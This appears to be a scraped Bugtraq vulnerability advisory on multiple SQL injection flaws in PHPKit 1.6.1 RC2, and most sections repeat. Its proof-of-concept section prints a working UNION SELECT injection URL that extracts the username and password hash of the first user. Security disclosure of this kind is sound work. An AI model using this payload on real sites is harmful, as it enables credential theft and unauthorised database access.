PHPKit Multiple SQL Injection Vulnerabilities
BID:21002
Info
PHPKit Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 21002 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 11 2006 12:00AM |
| Updated: | Nov 14 2006 10:11PM |
| Credit: | Philipp Niedziela is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
PHPKIT PHPKIT 1.6.1 RC2 |
| Not Vulnerable: | |
Discussion
PHPKit Multiple SQL Injection Vulnerabilities
PHPKit is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
PHPKit version 1.6.1 RC2 is vulnerable; earlier versions may also be affected.
PHPKit is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
PHPKit version 1.6.1 RC2 is vulnerable; earlier versions may also be affected.
Exploit / POC
PHPKit Multiple SQL Injection Vulnerabilities
Attackers can exploit these issues via a web client.
The following sample exploit is available:
http://www.example.com/include.php?path=faq/faq.php&catid=-1\'%20UNION%20SELECT%201,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20FROM%20phpkit_user%20where%20%20user_id=1%20and%20\'1\'=\'1
Attackers can exploit these issues via a web client.
The following sample exploit is available:
http://www.example.com/include.php?path=faq/faq.php&catid=-1\'%20UNION%20SELECT%201,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20FROM%20phpkit_user%20where%20%20user_id=1%20and%20\'1\'=\'1
Solution / Fix
PHPKit Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
PHPKit Multiple SQL Injection Vulnerabilities
References:
References: